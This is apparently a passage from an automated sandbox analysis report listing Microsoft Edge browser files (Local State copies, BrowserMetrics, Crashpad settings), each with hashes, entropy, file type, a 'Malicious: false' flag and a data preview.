SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os18eaYSlE0lCcGoup1Xl3jVzXr4z:z/Ps+wsI7ynEZ6Mpchu3VlXr4CRo1
MD5:	D6CFE8E14C6CD44D053DE545A8605B6F
SHA1:	7C4B7AE2E1B980C521EB04424FB9D94E8573C9B7
SHA-256:	4EF4148E2847608E388519CA0C48205A9C4635993E514E404FA32A79AB3E8D74
SHA-512:	5009D8C4C6FD38322C54A14512425EE1FAEF72584727C68F45881F8AF5FFBF7F2BE9E27E15565DD178C1FA2437852847DE717793115B5884B6AEE6BDAD694582
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\415001cf-9ce8-41aa-a6c7-4eb121e453f5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44600
Entropy (8bit):	6.097063435143659
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBXwuehDO6vP6Os1w0clfF/PE8xcGoup1Xl3jVzXr2:z/Ps+wsI7ynEP6MOchu3VlXr4CRo1
MD5:	F57F6B2BBB4ABCE0936CD2559013EC71
SHA1:	3C9B2E540AAECC8A804A5E6E0CBBC9D91487E0BC
SHA-256:	EE9A600C252900EA84FF82539786716F71819B4D412A3618153DDA0AB3B9A4F1
SHA-512:	D4D707E456658BD7DB3047012D58B2CE3C2CF87782A707DC610A2056F6F781EEEB0AA50BB06EF61B63B9C17D861DCC4F1F4AAFC7D7A6BD7DD7F61B0DCFF765F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4a3938d3-82b1-432c-85b2-7518be7f3659.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44600
Entropy (8bit):	6.097063435143659
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBXwuehDO6vP6Os1w0clfF/PE8xcGoup1Xl3jVzXr2:z/Ps+wsI7ynEP6MOchu3VlXr4CRo1
MD5:	F57F6B2BBB4ABCE0936CD2559013EC71
SHA1:	3C9B2E540AAECC8A804A5E6E0CBBC9D91487E0BC
SHA-256:	EE9A600C252900EA84FF82539786716F71819B4D412A3618153DDA0AB3B9A4F1
SHA-512:	D4D707E456658BD7DB3047012D58B2CE3C2CF87782A707DC610A2056F6F781EEEB0AA50BB06EF61B63B9C17D861DCC4F1F4AAFC7D7A6BD7DD7F61B0DCFF765F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8eb16ecd-c829-4e24-9ca0-9fc7ea6424d7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44623
Entropy (8bit):	6.096668174832137
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os1c3C6tpEpEF7ScGoup1Xl3jVzXq:z/Ps+wsI7ynEZ6MXchu3VlXr4CRo1
MD5:	9B7486511E8567F8FDF78617FDD57BFE
SHA1:	FAA7148C65FED7DB4C32A5CF321DBB46251E1293
SHA-256:	206A43CE2CB50D58D49BBE0C2F87EBCEDAB74FEF690C10B8FDCAAC8A9C0C0D51
SHA-512:	8BE0D87DD14D4EF3D182587E78DEEE0947C1424E226F994DA4FE07237F910FD912EBB441B3E3EEFF5CD01CF5C41A3B75A3D9A53DB598DB785BEC20A002B548C1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676D401F-16C0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.046717621714465925
Encrypted:	false
SSDEEP:	192:bvdZ0pqtm3nOAWV6YWJgA8x5XSggykfhMNNE4GIZ/ERQcpN4BEe9QAn8y08Tcm2D:zz0ctwMOgk9hgzYj4qeR08T2RGOD
MD5:	A3A8BC623C9A57318D2A16EC42EA6BA3
SHA1:	7425B5D84E8EEC4964E69E439B4EC653D33DB6EF
SHA-256:	E4467C722796B9A0889197BCAB2C90326C9CC3081D6EB2D0613F0E0BE7EC6784
SHA-512:	5C8731C5835FC8B6C80B65C4C60004DD8EFADC5F0363FD44F565C3A41C3422FA730C66CC2FF365D152F5389B54B08ACC42A7EA1269B3843DC86789D865637272
Malicious:	false
Preview:	...@..@...@.....C.].....@................g..8W..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".gmoamj20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676D4083-1EE0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.044858263726335564
Encrypted:	false
SSDEEP:	192:puNeB0pqtmqnOAWV6YIJgA8x5XSggykfhbNNETnIb/ERQcQKHd4n8y08Tcm2RGOD:LB0ctNMQgk9hZ/YjHK08T2RGOD
MD5:	B0858C1A41B9D05A99F59A23B743A228
SHA1:	617A441D3E41159ACF3DBFE554CB118BEC77B760
SHA-256:	92ADE80945F11FE949FA9395A51110CD9FD8C2E4403425CC83395E7D52BFDAD4
SHA-512:	76CE475E5B41FF5BAECCDD4CC460425ECCDAF3A89983E0D4E71F915E34C7146DAA96D2F15791C394125C84CFBFBE16414EBA3F7B3205A468ACA2CF8E30989541
Malicious:	false
Preview:	...@..@...@.....C.].....@...............pe..(U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".gmoamj20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2..........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676D4086-187C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04457038206628074
Encrypted:	false
SSDEEP:	192:/kZ0pqtmqnOAWVqYVJgA8x5XSggykfhMNNE4MIVh/0TQsZoR48n8y08Tcm2RGOdB:sZ0ctNMNgk9hgtlWtoT08T2RGOD
MD5:	7367473F50B77A03E96933EED195B2A5
SHA1:	C5DBF5E6B6F2C911AC2E4E231932D4D1B53E3F22
SHA-256:	0910450A2592D30B663BF33FD9D69ECCA1450CF09ED7CAFF59244BDCAF8BFA54
SHA-512:	F7CD31000E1548D799A22D796D2C24933A70885981ECF87B61EF9CE94CA34395EC3F72003466552617D33C58B61691C1CBEC12C1E9B39565788439C9F984E787
Malicious:	false
Preview:	...@..@...@.....C.].....@...............Hc...S..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".gmoamj20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._...... .2.......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5/ll:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	524B78A52718E3881DC4D65109515BF4
SHA1:	5B42C6DAC78CA50377B6BB7E0B522327A6C2E980
SHA-256:	F1E9D007FB89F73564C55A401829EC4A0532850A41BD97EF59D5078CE770C72B
SHA-512:	84FD33136516D7893B1B5DE07D642CFA500BA1283EAB13ED906CF8B26332401D5A2C491AF59FD031D6AC8404DD59140CA1362C746154358B18F0EA9D58E7CE67
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF428a2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF428b2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43276.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43286.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090772005629229
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMjwuF9hDO6vP6O+Otbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6/tbz8hu3VlXr4CRo1
MD5:	675E271F3C606592469301B0CB17AD8F
SHA1:	5CB014A325C81785AB6B1600BDE0045A3F235E67
SHA-256:	84BFCDE58B75D871356EFFFA1FF020EF1F1946C9186425F45797AF4C3DB1BAF0
SHA-512:	9A3BE7AC160E5BE2E6EFB71ED90FEFA78842D00573FF9B21C8CDDB183DE62C698B0E2E2F4670DAF3A39DCB31FAEEFAAE8C40D23325A4E654EBD33DB8219FBEB8
Malicious:	false
